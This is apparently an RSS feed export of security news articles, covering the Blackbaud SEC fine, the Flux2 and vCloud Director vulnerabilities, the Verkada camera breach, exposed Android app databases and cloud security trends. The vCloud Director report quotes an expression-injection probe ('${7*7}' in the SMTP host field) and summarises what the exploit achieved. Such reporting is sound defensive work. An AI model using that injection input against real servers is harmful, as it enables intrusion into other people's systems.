Blackbaud also acknowledged in its news release from July 2020 (which now refers to the company’s security website) that it had paid the ransom that the attackers demanded after getting proof that all of the stolen data had been deleted.

According to David Hirsch, Head of the SEC Enforcement Division’s Crypto Assets and Cyber Unit, “As the order finds, Blackbaud failed to disclose the entire effect of a ransomware attack despite its staff realizing that its prior public comments regarding the incident were erroneous.” This remark was made in response to the finding that Blackbaud had failed to disclose the full impact of a ransomware attack. Blackbaud did not live up to its commitment of providing accurate and timely important information to its investors, which is a requirement for publicly traded corporations.

According to the order issued by the SEC, Blackbaud committed violations of Section 17(a)(2) and Section 17(a)(3) of the Securities Act of 1933, as well as Section 13(a) of the Securities Exchange Act of 1934 and Rules 12b-20, 13a-13, and 13a-15(a) thereunder. Blackbaud agreed to pay a $3 million civil penalty, refrain from violating these requirements going forward, and stop committing breaches of these provisions without admitting or rejecting the SEC’s findings.

The post Blackbaud, a cloud software provider, fined $3 million for failing to notify customers of a ransomware attack appeared first on Information Security Newspaper | Hacking News.

]]>
Which Security Solutions Can Protect Hybrid Data Centers From Attacks https://www.securitynewspaper.com/2022/09/02/which-security-solutions-can-protect-hybrid-data-centers-from-attacks/ Fri, 02 Sep 2022 18:24:00 +0000 https://www.securitynewspaper.com/?p=25692 It’s estimated that 80% of large businesses already deploy hybrid cloud arrangements. The hybrid architecture combines the convenience of a cloud environment that can be ever-increased and scaled with on-premiseRead More →

The post Which Security Solutions Can Protect Hybrid Data Centers From Attacks appeared first on Information Security Newspaper | Hacking News.

]]>
It’s estimated that 80% of large businesses already deploy hybrid cloud arrangements.

The hybrid architecture combines the convenience of a cloud environment that can be ever-increased and scaled with on-premise centers that allow greater access control.

However, as organizations integrate this combined infrastructure as their data centers for the company, it raises many security concerns.

Data is interesting to cyber criminals. They can leak it, sell it to the highest bidder, use it to get into other organizations, and more.

And some companies might not even see them coming until they get a ransom note or experience a major breach.

How do you protect information within complex hybrid environments? What makes protecting a Hybrid Data Center challenging?

Let’s get over the most common difficulties that come up with hybrid data center protection.

Complex Infrastructure Seeks Simplified Security

With multi-cloud technology and hybrid data centers linked to everything from applications to endpoint devices of remote workers, it’s safe to say that modern business infrastructures are more complex than ever.

So, how do you protect data within such complex systems?

It seems counterintuitive, but as the architecture becomes more intricate, going back to basics and simplifying the security is the best way to go about protecting the company.

Normally, organizations add new security tools to protect new technology that they integrate into the existing infrastructure.

A complex cybersecurity infrastructure that consists of multiple tools means that analysts often lack a complete overview of the entire security.

Some ways that businesses can simplify their hybrid security include:

  • Automation with artificial intelligence
  • Unifying the versatile tools under the single dashboard

Artificial Intelligence Aids Security Analysts

The team of analysts that manage security already has a heavy workload. AI-powered tools aid them in keeping their sanity by automating incident responses where it’s possible and continually managing the security posture of the company.

The more work analysts can delegate to automation, the more time they have to dedicate to advanced threats or to automating parts of security.

More sophisticated attacks will require more of their time because such threats might bypass the radars of regular security solutions.

Behind those attacks can be a human that has been observing an organization to find its vulnerabilities for months — unlike automated malicious codes that attack any vulnerable company they can.

They are targeting specific enterprises and waiting for their opportunity to strike and obtain data.

In a nutshell, with AI, analysts can delegate repetitive tasks and focus their time on matters that require more brain power.

Unifying Security Tools

Another issue that analysts have to work with is continual alerts from different dashboards. On average, they get as many as 1000 alerts per day — depending on the size of the company. 

An overwhelming number of notifications come up as companies deploy versatile security solutions from multiple vendors. 

As most IT teams are well aware, the majority of said alerts don’t indicate a high-risk issue that has to be dealt with right away. Bombarded with these alerts, it’s possible to brush off things like server issues as false positives. Dangerous mistakes that can cost companies millions.

IT teams have to switch between multiple dashboards — which decreases the visibility of the attack surface and causes dashboard fatigue due to frequent changes of the environment.

Having a centralized overview of the tool the company uses to secure its assets strengthens the security all the while helping IT teams. 

Therefore, increasing visibility of the security posture and tools is another important feature that companies should strive for when choosing security solutions.

Cyber Solutions Should Keep Up With a Company

Security should follow the growth and changes within the organization. Essentially, they should also be scalable without disrupting the workflow of a company.

The organizations are going to add new tools and new team members that connect to the infrastructure remotely. This might require the protection of new security points and technology the company hasn’t used before.

Therefore, it’s integral to have a security solution that keeps the ever-evolving nature of the company in mind and doesn’t create gaps in security amid the scaling of a business.

Catching Up With the Ever-changing Attack Surface

Besides the growth of the company, which can be slow and steady, security tools have to keep up with even more dynamic attack surfaces.

With people working on the premises and with newly emerging hacking methods, the attack landscape can change in minutes — enough time for threat actors to exploit a vulnerability and get to the data seemingly protected within the system. 

As a result of the increased demand for remote work, more companies have been using cloud technology than ever before. This also means that more sensitive data is being stored within the premises and as the users log into the system.

Protecting information of the company, users of services, and employees – both on-premise and those working from home is a challenge because traditional security tools often can’t keep up with frequent changes within the attack surface.

For example, zero-day attacks target systems with methods that are not known to analysts.

To protect data in hybrid data centers, it’s necessary to employ security tools that are capable of in-depth traffic inspection and continual monitoring. Thorough and comprehensive solutions can mitigate unwanted activity early – even if hackers use novel attacks.

To Sum Up

What makes protecting the hybrid data centers difficult is that there are many tools on the market that can’t be integrated together and require different dashboards.

As new tools are added, analysts have less visibility and control over the increasingly complex infrastructure.

To protect the data, a strong and scalable security solution is integral for preventing incidents such as data leaks and company breaches.

For hybrid data centers, this means having security that can guard the systems that hold data both on the cloud and on-premises.

The post Which Security Solutions Can Protect Hybrid Data Centers From Attacks appeared first on Information Security Newspaper | Hacking News.

]]>
Cloud Solutions for Healthcare Industry https://www.securitynewspaper.com/2022/08/30/cloud-solutions-for-healthcare-industry/ Tue, 30 Aug 2022 13:05:00 +0000 https://www.securitynewspaper.com/?p=25673 In recent years, healthcare organizations have increasingly relied on cloud computing to acquire cloud healthcare solutions. The healthcare system as a whole relied on cloud computing during the pandemic. TheRead More →

The post Cloud Solutions for Healthcare Industry appeared first on Information Security Newspaper | Hacking News.

]]>
In recent years, healthcare organizations have increasingly relied on cloud computing to acquire cloud healthcare solutions. The healthcare system as a whole relied on cloud computing during the pandemic. The use of information technology from software engineering service providers like Yalantis has facilitated in providing technical solutions. These cloud solutions have benefited not only patients and doctors but also hospitals and clinics.

Better patient care, reduced costs, and remote access and collaboration are just advantages of healthcare’s growing adoption of cloud services. New opportunities to improve the efficiency of healthcare IT systems have emerged thanks to the adoption of cloud computing.

A 14.12 percent compound annual growth rate (CAGR) between 2022 and 2027 has been projected for the cloud computing market, which the report claims would drive it to $71,730.64 million. As a result, healthcare institutions are open to new technologies and willing to invest in their development.

What are Cloud Solutions for Healthcare

Cloud solutions are software-as-a-service (SaaS), infrastructure-as-a-service (IaaS), and platform-as-a-service (PaaS), and solutions that enable user organizations to store, process, and analyze data in a remote data center. Healthcare cloud computing are primarily used to store medical data, manage medical records, and offer software tools for medical staff. Cloud solutions can help healthcare organizations with scalability, security, and compliance challenges by enabling remote access to data and applications. Healthcare organizations can choose from a wide range of cloud services to support their digital transformation. These services can help organizations address their unique challenges, such as compliance requirements or the need for high-performance computing.

Healthcare IT Market Overview

Market growth is fueled by rising healthcare costs and consumer demand for more efficient, cutting-edge treatment options. The expansion of the market can be helped by raising consumer consciousness of cutting-edge innovations in response to unmet needs. A 2020 Healthcare IT News report reveals that demand for healthcare IT services has increased, with remote monitoring services growing from 13% to 22%.

Growth in smartphone and internet penetration is influencing the spread of healthcare IT. The January 2022 data report predicts there will be 4.95 billion internet users and 5.31 billion mobile phone users. The Mobile Economy 2020 predicts that by 2025, there will be 5.8 billion people using mobile devices. The number of people using the internet worldwide is expanding rapidly, by 4% each year, having climbed by 192 million to a total of 4.2 billion in 2021. The expansion of the smartphone and internet industries is anticipated to fuel the improvement of clinical results, patient satisfaction, and patient participation.

The aging population, the prevalence of chronic diseases, the rising cost of healthcare, and the rising demand for at-home care services like remote patient monitoring are all likely to drive the growth of the IT services industry. The rising prevalence of diseases like diabetes, cancer, hypertension, and cardiovascular disease is increasing the need for more practical information technology solutions. Adoption of healthcare IT is encouraged due to its ability to reduce medical errors, lower operational costs, and improve therapeutic outcomes. The expansion of the IT industry is predicted to be boosted by the positive activities and official support of governments in developing countries.

The ongoing Covid-19 epidemic hampered care delivery. It has sparked interest in telemedicine and online advisory services around the world. Developments in the information technology sector, higher digital literacy rates, and more receptive consumer behavior helped meet this rising need.

Benefits of Cloud Solutions in Healthcare

The benefits of healthcare in the cloud for healthcare organizations include scalability, availability, reliability, and cost savings.

Scalability

Cloud solutions can grow or shrink based on fluctuating capacity needs. The cloud architecture allows easy and cost-effective scaling to meet future capacity needs.

Availability

Cloud providers provide high availability through redundant data centers, networks, and automated failover mechanisms. The cloud architecture allows for better uptime and availability of critical applications.

Reliability

Cloud providers manage hardware, software, and operational costs. This leads to increased reliability and operational efficiency. Healthcare organizations operating their infrastructure are responsible for managing hardware and software, leading to higher costs and lower reliability.

Cost savings

Cloud solutions can reduce capital expenditures, operational expenses, and risk by shifting from on-premises hardware and software to a hosted service. Cloud adoption can also help accelerate innovation with the ability to test and deploy new solutions quickly.

Types of Cloud Computing in Healthcare

For the healthcare sector, cloud computing can be used in two deployment and distribution strategies.

Through Deployment

Limited to a single healthcare organization or network, a private cloud allows maximum security and exclusivity.

Collaboration – Multiple healthcare organizations can share cloud resources

Access to the cloud is available to the general public.

This model is considered a hybrid by combining features from some deployment types above.

By Distribution

With SaaS, a company rents out its server space on a shared network so that other businesses may use it to run their software.

In IaaS, the service provider hosts the client’s server hardware and software, allowing for easier application deployment.

PaaS is a “platform as a service,” wherein the provider provides the necessary software, operating system, and hardware.

How Is Cloud Computing Changing the Healthcare Industry?

It’s hardly surprising that more and more hospitals and clinics are looking into cloud services in healthcare. There have been wide cloud computing applications in healthcare. Fundamental transformative changes include:

• Simple Collaboration: Patient data is now easily accessible to medical practitioners regardless of location; other linked domains such as drugs, insurance, and health payments have emerged.

• Advanced-Data Mining: These days, a company’s data is its most precious possession. Regarding healthcare, HIPAA compliance in the cloud ensures that only the most pertinent and well-structured information about an individual’s health is kept and made available. Analytics has advanced to the point where they can provide a deeper understanding of complex medical problems.

• Democratized Medical Data: There has been an increase in patient involvement in healthcare decisions. Increased awareness of their options and a greater willingness to speak up for what they believe is the best result in a greater sense of empowerment and involvement in their healthcare.

Example of Cloud Solutions in Healthcare

• Cloud-based Electronic Health Records (EHRs) – With a cloud-based EHR, providers can access patient information from anywhere and at any time. This facilitates better care coordination and maximizes the potential of a single source of truth.

• Cloud-based Patient Engagement – Cloud solutions can be used to host patient portals, enabling patients to view their health data, schedule appointments, and communicate with their providers.

• Cloud-based Clinical Workflow – With the adoption of cloud solutions, providers can integrate their EHR with other systems and use them to enhance clinical workflow. For example, providers can use a cloud-based solution to integrate patient data with a scheduling system.

• Cloud-based Security – Healthcare organizations can use end-to-end encryption and a cloud-based solution to protect data in transit, at rest, and during transformation.

• Cloud-based Data Analysis – Cloud solutions can be used to host data analytics tools, enabling providers to analyze their data and extract insights.

Cloud solutions for healthcare can assist with managing clinical and operational workflow, data security, and compliance and provide cost savings and scalability. These solutions can also be used to help accelerate innovation, provide remote patient access to services, and more.

The post Cloud Solutions for Healthcare Industry appeared first on Information Security Newspaper | Hacking News.

]]>
Critical vulnerability in Flux2, a Kubernetes continuous delivery tool, enables hacking between neighboring deployments https://www.securitynewspaper.com/2022/05/19/critical-vulnerability-in-flux2-a-kubernetes-continuous-delivery-tool-enables-hacking-between-neighboring-deployments/ Thu, 19 May 2022 16:40:53 +0000 https://www.securitynewspaper.com/?p=25301 A recently detected vulnerability affecting Flux, a popular continuous delivery (CD) tool for Kubernetes, would reportedly allow tenants to sabotage the activities of “neighbors” who use the same infrastructure outsideRead More →

The post Critical vulnerability in Flux2, a Kubernetes continuous delivery tool, enables hacking between neighboring deployments appeared first on Information Security Newspaper | Hacking News.

]]>
A recently detected vulnerability affecting Flux, a popular continuous delivery (CD) tool for Kubernetes, would reportedly allow tenants to sabotage the activities of “neighbors” who use the same infrastructure outside of their own facilities.

Flux is an open and extensible CD solution to keep Kubernetes clusters in sync with configuration sources, and is used by firms across all industries, including Maersk, SAP, Volvo, and Grafana Labs, among many others. In its most recent version (Flux2), multi-tenant support was introduced, among other features.

The vulnerability was described as a remote code execution (RCE) error that exists due to improper validation of kubeconfig files, which define commands that will be executed to generate on-demand authentication tokens: “Flux2 can reconcile the state of a remote cluster when a kubeconfig file exists with the correct access rights,” points a report posted on GitHub.

Paulo Gomes, a software engineer who collaborates at the Cloud Native Computing Foundation (CNCF), which originated GitOps and provides support for Flux and Kubernetes, mentions: “The tool can synchronize the declared state defined in a Git repository with the cluster in which it is installed, which is the most commonly used approach, or it can target a remote group.”

Gomes adds that the access required to target remote clusters depends largely on the intended scope. This is completely flexible and is based on the fact that Kubernetes RBAC has a wide range of granularity. This behavior allows a malicious user with write access to a Flux source or direct access to the target cluster to create a specially crafted kubeconfig file to execute arbitrary code in the controller container.

When analyzed according to version 2 of the Common Vulnerability Scoring System (CVSS), this vulnerability was considered of medium severity and received a score of 6.8/10, because in single-tenant deployments, the error is less dangerous and the attackers obtain almost the same privileges required for exploitation.

However, the flaw receives a score of 9.9/10 according to CVSS v3.1, as this release includes a metric around ‘scope’ changes, which means that the flaw can affect resources beyond the security scope managed by the developers of the vulnerable component.

The flaw has already been addressed by the creators of the tool, so users of affected deployments are advised to upgrade as soon as possible.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Critical vulnerability in Flux2, a Kubernetes continuous delivery tool, enables hacking between neighboring deployments appeared first on Information Security Newspaper | Hacking News.

]]>
The Future of Cloud Security https://www.securitynewspaper.com/2021/12/14/the-future-of-cloud-security/ Tue, 14 Dec 2021 15:00:00 +0000 https://www.securitynewspaper.com/?p=24593 The future of cloud security is dictated as much by the technology rising across the magic quadrants as the adversaries infringing upon businesses and corporate networks. Understanding the blend ofRead More →

The post The Future of Cloud Security appeared first on Information Security Newspaper | Hacking News.

]]>

The future of cloud security is dictated as much by the technology rising across the magic quadrants as the adversaries infringing upon businesses and corporate networks. Understanding the blend of legacy and innovative technical solutions, diverse companies’ security constraints and industry regulations are increasingly giving light to new methods and approaches to enhancing security and creating the fundamental processes in place to demand business continuity.

Below, we’ll outline some of the leading trends in Cloud security, critical technology which is defining the face and future of IT management as well as some of the leading market segments taking center stage in the fight to secure the cloud.

Up and coming technologies and sectors

Cloud security is inextricably linked to the dynamic and rapidly evolving technology solutions and sectors created to mitigate its risk and present enhanced data visibility. While all have arisen from decades of complex technical tasks, in recent years these new categories are centralizing and analyzing data at a level unheard of just a few short years ago.

With upwards of 92% of organizations hosting their data on the cloud, the need to enhance security and create essential layers of protection has never been higher. To address the increased focus on cloud security, two major categories appear to be leading the way in simplifying data visualization and providing clear mitigation value for system admins.

  • CSPM

According to Gartner: “Cloud Security Posture Management (CSPM) is a market segment for IT security tools that are designed to identify misconfiguration issues and compliance risks in the cloud. An important purpose of CSPM programming is to continuously monitor cloud infrastructure for gaps in security policy enforcement.”

CSPM solutions assist IT professionals in identifying and mitigating often complex cybersecurity risks across the cloud. By unifying and centralizing many cloud-based security and management tools CSPM can effectively analyze configurations to detect potential security issues and fix misconfigurations before hackers can exploit them.

  • CIEM

Cybersecurity analysts and increasingly looking towards the rise of CIEM technology to meet this strategic need, with businesses investing in the segment with CIEM components being incorporated to manage cloud-based entitlement risk. CIEM is filling a gap that legacy and other cloud security solutions do not address.

Simply put, CIEM tools enable enterprises to manage their cloud access risks more effectively through the governance of entitlements in hybrid and multi-cloud IaaS. What differentiates CIEM from its component parts is its capability to blend machine learning (ML) and other methods to detect anomalies in account entitlements in real-time to provide remediation of privileges and policy enforcement all in one process. 

ROI and risk in cloud security

Cloud security is the result of effectively implemented firewalls and constant penetration testing. It is the realization of obfuscation, tokenization, and the use of virtual private networks (VPN) to build a significant barrier from attack while maintaining cloud-based assets security against attacks. While, in practice the more element you add the more complex the process becomes, regarding new management categories and the centralization of data in the cloud, some very clear ROI has already begun to be realized.

CIEM and CSPM systems provide value in:

  • Minimizing the impact of human error through automation and entitlement management
  • Centralizing visibility of cloud-based functions
  • Tracking thousands of identities with seamless integration and access of data points
  • Providing a process for detecting and rectifying anomalies
  • Remediating excessive entitlements and configuration risk

Key takeaways

Cloud security is not a buzzword or catchphrase being pushed by IT to build fear and garner resources. It is the lifeblood of most companies’ data management strategy, and it is mission-critical for the continuity of any business with resources in the cloud. 

According to the 2020 IDG Cloud Computing survey: “Cloud adoption levels that have held steady since 2015 have accelerated in the last two years with 81% of survey respondents reported already using computing infrastructure or having applications in the cloud, compared to 73% in 2018.” 

With cloud adoption taking center stage, and the risks that go along with cloud migration and security going closely in hand the need has arisen for new market segments to provide previously disconnected tools a central role in visualizing data and mitigating risk. Through the use of CIEM and CSPM solutions, organizations with data on the cloud can now bring their data together, mitigate cyber risk and human error to simplify data management on the cloud.

The post The Future of Cloud Security appeared first on Information Security Newspaper | Hacking News.

]]>
Information from more than 100 million Android users exposed by massive data breach https://www.securitynewspaper.com/2021/05/20/information-from-more-than-100-million-android-users-exposed-by-massive-data-breach/ Thu, 20 May 2021 16:29:27 +0000 https://www.securitynewspaper.com/?p=23556 Cybersecurity specialists report that the personal information of around 100 million Android device users has been exposed due to incorrect security settings in a cloud storage deployment. This information wasRead More →

The post Information from more than 100 million Android users exposed by massive data breach appeared first on Information Security Newspaper | Hacking News.

]]>
Cybersecurity specialists report that the personal information of around 100 million Android device users has been exposed due to incorrect security settings in a cloud storage deployment. This information was found in databases without the necessary protections, linked to about 23 applications with records of between 10,000 and 10 million downloads.

According to the experts who reported the incident, this is a sign of the poor security practices followed by Android developers, which undoubtedly poses a security risk. Researchers believe this is a widespread problem and easily exploitable by threat actors.

The report presented by Check Point researchers, mentions that some of the databases were unprotected and any user who knows where to look for this information can easily access it. The compromised information includes details such as:

  • Full names
  • Phone numbers
  • Email addresses
  • Dates of birth
  • Texting
  • Location details
  • Gender
  • Passwords
  • Payment details

Most apps related to this leak are available on the Google Play Store and are relatively popular on the platform. Among the platforms involved with at least 10 million downloads are Logo Maker and Astro Guru; other less popular apps, such as T’Leva, rank in the range of 10,000 and 500,000 downloads.

Researchers also found sensitive information reserved for the developers of these apps, including credentials to access push notification services. Experts also found the cloud storage system access credentials for at least one app available from the Play Store.

Finally, experts also discovered that the iFax app for Android also stored cloud storage keys and the database contained documents and fax transmissions from more than 500,000 users. However, experts also noted that some developers used the principle of security through darkness, obfuscating the secret calve using a base64 encoding.

Although the problem is not new, researchers are still surprised by the poor security practices employed by Android developers. To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Information from more than 100 million Android users exposed by massive data breach appeared first on Information Security Newspaper | Hacking News.

]]>
Cybercriminals hack over 150,000 security cameras; espionage risk active https://www.securitynewspaper.com/2021/03/10/cybercriminals-hack-over-150000-security-cameras-espionage-risk-active/ Wed, 10 Mar 2021 18:35:19 +0000 https://www.securitynewspaper.com/?p=23215 Verkada, a startup company that provides a cloud-based security camera system, acknowledged that it was affected by a security incident, allowing threat actors to access more than 150,000 security camerasRead More →

The post Cybercriminals hack over 150,000 security cameras; espionage risk active appeared first on Information Security Newspaper | Hacking News.

]]>
Verkada, a startup company that provides a cloud-based security camera system, acknowledged that it was affected by a security incident, allowing threat actors to access more than 150,000 security cameras installed on the premises of all kinds of organizations, including Cloudflare, Tesla, Equinox, and even prisons, schools, and police stations.

Verkada sells internet-connected security cameras, using the approach known as “software first.” Cloud-connected cameras include a sophisticated web-based interface for businesses to control their streams and also offer facial recognition software as a Premium option.

Soon after, Tillie Kottmann, a member of the international hacking effort responsible for the incident stated that his goal was to show how vulnerable the systems operating in the company’s security cameras are. In addition to live streaming of affected cameras, hackers would also have accessed the full video logs.

In this regard, a Verkada representative mentioned: “As a security measure, we deactivate all administrator accounts to prevent any unauthorized access to these resources; our security team is already in collaboration with an internal firm to investigate the actual scope of the incident.”

On the method of attack used by hackers, it appears that this group gained “super administrator” level access to affected systems using a username and password exposed on the Internet. Once there, threat actors gained access to the company’s entire network, including root access to cameras and live streaming.

The company has also been criticized in the past for allegations of sexism and discrimination following a 2019 incident in which a sales director used security cameras at its facility to harass his co-workers and post private images on The Slack Employees channel of Verkada.

So far, improper access to Verkada cameras has been confirmed at facilities in organizations such as Tesla, Cloudflare, Florida’s Halifax Health Hospital Center, Sandy Hook Elementary School, Madison County Jail in Alabama, among other public and private organizations. Hackers also claimed to have personal and financial information from thousands of users and employees of the company.

The hackers who claimed responsibility for the attack do not yet mention whether their intention is to obtain a ransom in exchange for not disclosing this information, although the cybersecurity community does not rule out the ransom demand occurring in the coming days.

The post Cybercriminals hack over 150,000 security cameras; espionage risk active appeared first on Information Security Newspaper | Hacking News.

]]>
Vcloud Director vulnerability allows hacking networks of enterprises using VMware https://www.securitynewspaper.com/2020/06/02/vcloud-director-vulnerability-allows-hacking-networks-of-enterprises-using-vmware/ Tue, 02 Jun 2020 15:58:52 +0000 https://www.securitynewspaper.com/?p=20030 A group of database activity monitoring specialists has revealed the finding of a critical vulnerability in Cloud Director, a cloud resource deployment, automation and management platform developed by VMware. ExploitingRead More →

The post Vcloud Director vulnerability allows hacking networks of enterprises using VMware appeared first on Information Security Newspaper | Hacking News.

]]>
A group of database activity monitoring specialists has revealed the finding of a critical vulnerability in Cloud Director, a cloud resource deployment, automation and management platform developed by VMware. Exploiting this vulnerability would allow threat actors to access sensitive information and control private configuration cloud deployments within a complete infrastructure.

The security report mentions that the vulnerability can be exploited through HTML5 and Flex-based user interfaces, the Explorer API interface, and the access API. The flaw can be found in versions 10.0.x earlier than 10.0.0.2, in 9.7.0.x earlier than 9.7.0.5 and in 9.1.0.x earlier than 9.1.0.4.   

Database activity monitoring specialists from Czech firm Citadelo discovered the vulnerability after a company (whose name was not revealed, but is known to be on the Fortune 500 list) to conduct a security audit on its cloud infrastructure. The cybersecurity firm also published a proof of concept to demonstrate the flaw’s exploitation.

“We discovered the flaw from a simple anomaly; when you enter ${7*7} as the host name for the SMTP server in vCloud Director, we sense an error: the string value is in an invalid format, indicating some form of expression language injection. We were able to evaluate simple server-side functions,” the Citadelo report says.  

According to the database activity monitoring experts, using this condition as an entry point, arbitrary Java classes (such as “java.io.BufferedReader”) can be accessed and instantiated when sending malicious payloads in vulnerable software. In their proof of concept, researchers were able to:

  • View the contents of the system database, including password hashes of the clients assigned to the deployment
  • Modify the system database to access virtual machines
  • Scale privileges from “Organization Administrator” to “System Administrator”
  • Modify the Cloud Director login page, allowing hackers to get other customers’ passwords
  • Access other sensitive customer-related data, such as full names, email addresses, or IP addresses

VMWare acknowledged the report and announced the release of the relevant fixes, which are already available. The company fixed the flaws in a number of updates covering versions 9.1.0.4, 9.5.0.6, 9.7.0.5 and 10.0.0.2. The company also published a workaround on its website.

For further reports on vulnerabilities, exploits, malware variants, and computer security risks, cybersecurity awareness experts recommend visiting the International Institute of Cyber Security (IICS) website, as well as official technology company platforms.

The post Vcloud Director vulnerability allows hacking networks of enterprises using VMware appeared first on Information Security Newspaper | Hacking News.

]]>
400 vulnerabilities reported on Oracle, update your servers before hackers take control of them https://www.securitynewspaper.com/2020/04/14/400-vulnerabilities-reported-on-oracle-update-your-servers-before-hackers-take-control-of-them/ Tue, 14 Apr 2020 19:01:59 +0000 https://www.securitynewspaper.com/?p=19322 Despite declining global activities, reports of security flaws in technological developments continue to appear. Cloud security course experts mention that Oracle quarterly security update includes fixes for 405 different vulnerabilities,Read More →

The post 400 vulnerabilities reported on Oracle, update your servers before hackers take control of them appeared first on Information Security Newspaper | Hacking News.

]]>
Despite declining global activities, reports of security flaws in technological developments continue to appear. Cloud security course experts mention that Oracle quarterly security update includes fixes for 405 different vulnerabilities, of which 286 can be exploited remotely.

The announcement about the update, released on Monday, mentions that a total of 13 Oracle products have security flaws that received 9.8/10 scores on the scale of the Common Vulnerability Scoring System (CVSS), including Oracle Financial Services Applications, Oracle MySQL, Oracle Retail Applications, and Oracle Support Tools.

On its own, the Oracle Fusion Middleware product will need to fix 49 vulnerabilities that could be exploited by remote threat actors without authentication. In other words, the flaws can be exploited on a network without requiring privileged user credentials, cloud security course specialists mention.

On the other hand, users of the Oracle Fusion Middleware software family will need to install a total of 56 security patches that affect nearly 20 related services, including Identity Manager Connector (v. 9.0), Big Data Discovery (v. 1.6) and WebCenter Portal (v. 11.1.1.9. 0, 12.2.1.3.0, 12.2.1.4.0).

This bulk update also includes patches to fix moderately serious security flaws. Fifteen of these moderate security flaws received a score of 8.5/10 on the CVSS scale and can be exploited remotely by an unauthenticated hacker, cloud security course specialists mention. Additional technical details for each of these vulnerabilities will be released next Thursday.

Finally, Oracle also included fixes for 34 critical vulnerabilities in the Oracle Financial Services suite, of which 14 are remotely exploitable. In addition, 45 security flaws were found in Oracle MySQL that could be exploitable remotely; one of these flaws received a score of 9.8/10 on the CVSS scale. 

The report concludes by mentioning that the Oracle Database Server line contains nine security errors, two are remotely exploitable, and received a score of 8/10 on the CVSS scale. Oracle received no reports of exploit attempts for any of these flaws, but urges affected deployment administrators to install the appropriate updates as soon as possible.

For further reports on vulnerabilities, exploits, malware variants and information security risks you can access the Website of the International Institute of Cyber Security (IICS), as well as the official platforms of technology companies.

The post 400 vulnerabilities reported on Oracle, update your servers before hackers take control of them appeared first on Information Security Newspaper | Hacking News.

]]>